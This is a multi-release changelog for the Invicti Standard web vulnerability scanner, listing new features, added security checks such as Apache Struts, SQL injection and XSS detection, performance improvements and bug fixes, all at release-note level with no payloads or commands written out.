Invicti Standard

NEW FEATURES

• Users can now preconfigure local/session web storage data for a website.
• Added a new send to action to send e-mails.
• Added HTTP Header Authentication settings to add request HTTP Headers with authentication information.
• Added CSV file link importer.
• Parsing of form values from a specified URL.
• Added custom root certificate support for manual crawling.
• Added gzipped sitemap parsing support.

NEW SECURITY CHECKS

• Added reflected “Code Evaluation (Apache Struts 2)” security check (CVE-2017-12611).
• Added “Remote Code Execution in Apache Struts” security check. (CVE-2017-5638).

IMPROVEMENTS

• Renamed “Important” severity name to “High”.
• Updated external references for several vulnerabilities.
• Improved default Form Values settings.
• Improved scan stability and performance.
• Added Form Authentication performance data to Scan Performance knowledgebase node.
• Added “Run only when user is logged on” option to the scan scheduling.
• Added a warning before the scan starting if there are out of scope links in imported links.
• Improved Active Mixed Content vulnerability description.
• Improved DOM simulation for events attached to document object.
• Added “Alternates”, “Content-Location” and “Refresh” response header parsing.
• Removed “Disable IE ESC” requirement on Windows server operating systems.
• Improved Content Security Policy (CSP) engine performance by checking CSP Nonce value per directory.
• Changed sqlmap payloads to start with sqlmap.py, including the .py extension.
• Added –batch argument to sqlmap payloads.
• Removed Markdown Injection XSS attack payloads.
• Filtered out irrelevant certificates generated by Invicti from client certificate selection dropdown on Client Certificate Authentication settings.
• Added highlighting for detected out of date JavaScript libraries.
• Added ALL parameter type option to the Ignored Parameters settings.
• Added gtm.js (Google Tag Manager JS library) to the default excluded scope patterns.
• Added an option to export only PDF reports without HTML.
• Added -nohtml argument to CLI to create only pdf reports.
• Updated the Accept header value for default scan policy.
• Added CSS exclusion selector supports frames and iframes.
• Added embedded space parsing for JavaScript code in HTML attribute values.
• Added scan start time information to the dashboard.
• Skip Phase button is disabled if the phase cannot be skipped.
• Added validation messages for invalid entries on start new scan dialog sections.
• Added parsing source information to Scanned URLs List and Crawled URLs List (JSON) reports.
• Added highlight support for password transmitted over HTTP vulnerabilities.
• Email disclosure will not be reported for email address used in form authentication credentials.
• Added focus and blur event simulation for form authentication set value API calls.
• Uninstaller now checks for any running instances.
• Internal proxy now serves the certificate used through HTTP echo page.
• Added spell checker for Report Policy Editor.
• Added an error page if any internal proxy exception occurs.
• Added more information about the HTML form and input for vulnerabilities found on HTML forms.
• Added a JavaScript option to specify JavaScript cookies to persist across authentication and DOM simulation.
• Extensions on the URLs are handled by the custom URL rewrite rule wizard.
• Added Parameter Value column to Vulnerabilities List CSV report.
• Added match by HTML element id for form values.
• Added “Ignore document events” to JavaScript settings to ignore triggering events attached to document object.
• Improved Windows Short Filename vulnerability details Remedy section.
• Improved scan policy security check filtering by supporting short names of security checks.
• Improved Burp file import dialog by removing the file extension filter.
• Improved table column widths on several reports.
• Updated default User-Agent HTTP request header string.
• URL Rewrite parameters are now represented as asterisks in sqlmap payloads.

FIXES

• Fixed the InvalidOperationException on application exit.
• Fixed CSRF vulnerability reporting on change password forms.
• Fixed Email Disclosure highlight issue where only the first email address is highlighted when there are multiple email addresses on the page.
• Fixed case sensitivity checks while matching ignored parameters, now it matches case sensitive.
• Fixed the incorrect progress bar value displayed when a scan is imported.
• Fixed the incorrect disabled external references section in WordPress Setup Configuration File template.
• Fixed up/down movement issue on Form Values when multiple rows are selected.
• Fixed various source code disclosure issues.
• Fixed an escaping issue with CSS exclusion selectors.
• Fixed the issue where the basic authentication credentials are not being sent on logout detection phase.
• Fixed a NullReferenceException when an invalid raw request is entered in request builder.
• Fixed HTTP Request Builder where it does not set request method to POST if the selected method is PUT.
• Fixed the issue where the response URL is displayed in the vulnerability details.
• Fixed the issue where some links were not excluded from scan from sitemap.
• Fixed enabled security check group with all security checks within are disabled.
• Fixed a random DOM simulation exception occurs when site creates popup windows.
• Fixed a RemotingException occurs on Form Authentication Verifier.
• Fixed a possible NullReferenceException on Form Authentication.
• Fixed the message dialog windows displayed by the 3rd party component on Form Authentication Verification.
• Fixed the broken form authentication custom script when the last line of the script is a single line comment.
• Fixed certificate search in store by subject name returns matches without exact subject names.
• Fixed ESC key handling on message dialogs.
• Fixed huge parameter value deserialization memory usage.
• Fixed an issue with Load New License occurs when the source and destination license files are same.
• Fixed the issue where the parsing source is set to Unspecified for links found by resource finder in reports.
• Fixed the incorrect sitemap representation of excluded nodes when a scan is imported.
• Fixed the wrong URLs added with only extension values.
• Fixed the logout detection portion of form authentication verification where it was not using the configured proxy.
• Fixed the message overflow issue in the out of scope link warning dialog.
• Fixed a NullReferenceException which may be thrown while importing a swagger file.
• Fixed the incorrect Skip Current Phase button state when scan phase is changed
• Fixed internal proxy throwing when certain browsers do not send the full URL with the initial request.
• Fixed an issue in which the form authentication is not being triggered on retest.
• Fixed StackOverflowException in swagger parser thrown while parsing objects containing circular references.
• Fixed a swagger file parsing issue where target URL should be used when host field is missing.
• Fixed swagger importer by ignoring any metadata properties.
• Fixed the empty request/response displayed for some sitemap nodes with 404 response.
• Fixed the autocomplete issue in Content-Type header in Request builder
• Fixed a NullReferenceException occurs during DOM simulation.
• Fixed the incorrect URLs parsed on attack responses.
• Fixed the redundant duplicate HTTP requests issued by Web App Fingerprinter.
• Fixed show/hide issue for Dashboard and Sitemap panels.
• Fixed the issue where Retest All button disappears after a Retest.
• Fixed the issue where the dollar sign in imported URL is encoded after scan.
• Fixed the empty request/response header issue for links discovered during attacking.
• Fixed ignore parameter issue for parameters containing special characters.
• Fixed a NullReferenceException that occurs for select elements missing option elements on multipart requests.
• Fixed missing vulnerabilities requiring late confirmation for incremental scans.
• Fixed a NullReferenceException may occur on iframe security checks.
• Fixed the exception that occurs while adding duplicate POST parameters with the same name in Request builder.

NEW SECURITY CHECK

• Added more Command Injection and Blind Command Injection patterns for Windows systems.

IMPROVEMENT

• Updated vulnerability database to latest version.

FIX

• Fixed the incorrect percentage encoding on Detailed Scan Report template.

NEW SECURITY CHECK

• Added “Out of Band Code Evaluation (Apache Struts 2)” security check (CVE-2017-12611).

IMPROVEMENTS

• Improved the stability of DOM and JavaScript simulation.
• Improved report templates.

NEW SECURITY CHECK

• Added “Out of Band Code Evaluation (Apache Struts 2)” security check (CVE-2017-9805).

FIX

• Fixed an out of memory issue.

IMPROVEMENTS

• Improved the form authentication element click API by providing the mouse coordinates.

FIXES

• Fixed an object leak causing performance issues during scans.
• Fixed a backup file check where scan policy selections were not honoured.
• Fixed the broken Basic, NTLM/Kerberos “Test Credentials” button.
• Fixed the unencrypted credentials saved with profile files.
• Fixed the JavaScript parsing issue by checking the mime type of the script tags.
• Fixed the broken email disclosure detection which was not able to match multiple emails.
• Fixed the incorrect links parse on JavaScript source map files.

NEW FEATURES

• New Basic, NTLM, Digest and Kerberos authentication settings to support multiple credentials for different URL paths.

NEW SECURITY CHECKS

• Checks for default pages of IIS 10.0, 8.5, 7.5, 7.0 web servers.
• Checks for WordPress Setup Configuration File.
• Remote Code Execution checks for Node.js on Windows.

IMPROVEMENTS

• Improved Local File Inclusion (LFI) attack patterns.
• Improved DOM XSS attack patterns.
• Improved Blind Command Injection detection on Linux systems.
• Added response compression and length information to HTTP Request Builder.
• Displaying times in 24-hour format on scan reports.
• Improved DOM/JavaScript simulation.
• Improved the performance of email address disclosure detection.
• Improved the performance of database connection string disclosure detection.
• Improved the performance of JavaScript library detection.
• Improved the performance of RoR database configuration detection.
• Improved “Enter Links” dialog by adding format selection for all the supported import formats.
• Added parameter type information to nodes on “Issues” panel.
• Improved scan import performance significantly.
• Added context menu item for sitemap root node to open the scan folder.
• Improved resource finder to find more hidden resources.
• Time zone information added to reports.
• Improved support for simulating customized select elements.
• Improved NTLM, Digest and Kerberos authentication support.
• Improved DOM simulation stability and performance.
• Added the list of URLs that do not match the rewrite rules on URL Rewrite knowledge base.
• Added number of links that match to a URL Rewrite rule on URL Rewrite knowledge base.
• Added out of scope links count information to the knowledge base.
• Improved the default parameter name list for Parameter Based Navigation.
• Added NTLM and Digest authentication support to the generated sqlmap and cURL commands.
• Improved boolean and blind SQL injection checks for MySQL databases.
• Improved blind SQL injection checks for PostgreSQL databases.
• Added excluded URLs list to the detailed scan report.
• Improved reflected and stored XSS detection.
• HSTS checks now reports missing preload directives.
• Updated Korean translation.
• Added XML report types for Crawled URLs List and Scanned URLs List reports.
• Added toolbar to open and copy URLs for Browser View tab.
• Improved JSON response parsing.
• Improved DOM based XSS payloads by prepending a URL to referer to make it practically work on web browsers.
• Improved email disclosure checks by checking host names against to public suffix list.

FIXES

• Fixed the error caused by null bytes in attack patterns while sending vulnerabilities to JIRA.
• Fixed an incorrect “Password Transmitted over HTTP” issue for relative URLs on pages redirected to HTTPS addresses.
• Fixed the NullReferenceException thrown while importing certain HAR (HTTP Archive) files.
• Fixed the missing activities while performing a controlled scan.
• Fixed the missing DOM parsing activity when “Override Target URL with authenticated page” option is selected.
• Fixed the incorrect total security check count while performing controlled scans on activity list.
• Fixed incorrect “Interesting Header” report for Content-Security-Policy header.
• Fixed the redundant extra headers added to requests while using request builder.
• Fixed the disabled “Start Proxy” button when Invicti is opened after an application crash.
• Fixed directory listing is not reported issues on some IIS versions.
• Fixed page break issues on reports.
• Fixed the issue where comments in CSS files are not parsed.
• Fixed the incorrect URL found in CSS comments.
• Fixed incorrect CSRF vulnerability reports by taking hidden token input into account.
• Fixed an IndexOutOfRangeException caused by CSP checks.
• Fixed the signature pattern which fails to match “Programming Error Message (PHP)” in multiple lines.
• Fixed markdown XSS attack patterns causing incorrect findings.
• Fixed the double quote encoding issue on generated sqlmap commands.
• Fixed incorrect “Interesting Header” reports for some headers.
• Fixed the incorrect http protocol displayed for SSL vulnerabilities.
• Fixed the duplicate delete confirmation message while deleting the scan and report policies using a keyboard shortcut.
• Fixed an issue where DOM simulation is performed for checking XSS once per XPath.
• Fixed the incorrect progress report during controlled scans.
• Fixed the encoding issue on reported DOM XSS stack traces.
• Fixed the highlighting issue of multiple custom data reported on vulnerabilities.
• Fixed the incorrect rows deleted issue when multiple rows are selected on imported links section.
• Fixed the incorrect behaviour of move up/down controls on custom URL rewrite section.
• Fixed the maximum crawled URL limit exceeded issue.
• Fixed duplicate resource finder requests.
• Fixed CSS escaping in CSS selector generation.
• Fixed the failing error report when the unexpected exception title is too long.
• Fixed the WADL import issue where the operation fails for responses with no status codes.
• Fixed incorrect HttpOnly reports of XSRF-TOKEN cookies, due to its nature these cookies must be accessed from JS code.
• Fixed incorrect cURL and sqlmap commands when basic authentication is used.
• Fixed the incorrect missing object-src report on CSP checks.
• Fixed an issue where default crawled value is double-encoded instead of single.
• Fixed the problem where the unique links added twice while importing Postman files.
• Fixed the “Property set method not found” that occurs while using FogBugz send to action
• Fixed the missing content for Site Profile section of Knowledge Base report.
• Fixed “The selected task no longer exists.” error when trying to run a scheduled scan on some Windows machines.

IMPROVEMENTS

• Enhanced and fixed several DOM simulations.
• Removed redundant SSL logs caused by HSTS security checks.
• Improved localization capabilities of Report Policy Editor.

NEW FEATURES

• Manual Crawling (Proxy Mode) now supports protocols like TLS 1.1 and 1.2.
• Added scan policy settings for CSRF security checks.
• Added ability to use custom HTTP headers during scan.
• Added element exclusion support using CSS query selectors for DOM/JavaScript simulation.
• Added /generatereport CLI argument for report generation from scan session files.
• Added hex editor view for requests on request builder.
• Added attacking optimization option for recurring parameters on different pages.
• Added a new knowledgebase item called Site Profile that lists information about target web site such as the web server operating system, database server, JavaScript libraries used etc.

NEW SECURITY CHECKS

• Added Referrer Policy security checks.
• Added markdown injection XSS patterns.
• Added HostIP and IPv6 patterns to MySQL and SSH SSRF security checks.
• Added Database Name Disclosure security checks for MS SQL and MySQL.
• Added Out of Date security checks for several JavaScript libraries.
• Added Remote Code Evaluation (Node.js) security checks.
• Added SSRF detection with server-status.
• Added user controllable cookie detection.
• Added Context-Aware XSS detection by generating XSS payloads based on the reflected context without breaking it.

IMPROVEMENTS

• Updated the links to several external references.
• Added cancellation of ongoing attack activities when excluded from site map.
• Improved JavaScript and CSS resource parsing.
• Added exploitation for XXE vulnerabilities.
• Added DOM simulation options to scan policy optimizer wizard.
• Improved Mixed Content vulnerability reporting by separating them according to resource types.
• Improved the CSS query selector generation on form authentication custom script dialog.
• Improved boolean SQL injection detection for redirect responses.
• Improved WSDL parsing for files that contain optional extensions.
• Added current scan profile, scan policy and report policy names to status bar.
• Improved .sql file detection signature.
• Improved the highlighting of patterns on HTTP responses.
• Added extra confirmation for weak credentials detection.
• Added POST parameters to crawling activities on scan activity list.
• Added scan policy option to allow XHR requests during DOM simulation.
• Added response statistics to request builder.
• Added form value for password input types to default scan policy.
• Added status column to the request history in request builder.
• Increased the maximum response size limit for JavaScript resources.
• Improved the send to JIRA error message.
• Added maximum number of option elements per select element to simulate scan policy setting.
• Added filter ‘colon’ events scan policy option to filter events that contain colon character in its name during DOM simulation.
• Improved error based SQLi exploitation by generating prefix/suffix dynamically.
• Improved command injection vulnerability detection by prepending original parameter value to attack payload.
• Improved LFI vulnerability detection by detecting HTML and URL encoded PHP source codes.

FIXES

• Fixed the incorrect imported link count when search panel is active on the grid view.
• Fixed the “Open in Browser” context menu action broken for root nodes on site map.
• Fixed the undefined password value issue on form authentication custom script dialog.
• Fixed an issue where error based SQLi confirmation is done based on the first seen database signature when multiple signatures appear in source code.
• Fixed the duplicate import link issue.
• Fixed request builder issues on parsing query string and encoding.
• Fixed a request builder issue where the error dialog should not be shown while switching tabs if the raw request is empty.
• Fixed an issue where XSS is missed when injected payload is not executed due to a syntax error.
• Fixed the broken custom cookie issue where the custom cookie is not sent for imported scan files.
• Fixed crawling of URLs on pages where base element points to some other URL.
• Fixed some missing vulnerabilities on site map.
• Fixed the slow performing certificate load operation on start new scan dialog.
• Fixed the incorrect vulnerability severity counts on bar chart and status bar.
• Fixes an issue where blacklisted Invicti attacks prevent further source code disclosures in HTML response.
• Fixed the splash screen which stays open when Invicti is started from command line.
• Fixed the focus stealing issue when HTML response contains the autofocus attribute.
• Fixed an issue where mixed content vulnerabilities are missing because DOM simulation is skipped due to missing JavaScript in HTML source.
• Fixed missing response on request builder when the request is loaded from history list.
• Fixed issues where empty POST parameter is imported and headers added as disabled for Postman files.
• Fixed an issue where signature fails to match MS SQL username in error messages.
• Fixed an issue where vulnerability is missed because of that not appending arbitrary value to extra querystring parameter name.

New Security Check

• Added new vulnerability checks for Apache Struts framework vulnerabilities.

Improvements

• Added JSON format option for “Crawled URL(s) List”, “Scanned URL(s) List” and “Vulnerabilities List” report templates.
• Improved Blind SQL Injection detection for MySQL databases.

Fixes

• Fixed the incorrect weak signature algorithms reported for root certificates.
• Fixed the broken editing capabilities on report policy editor.
• Fixed the empty activity list issue during scans.
• Fixed the missing custom cookie issue on imported scans.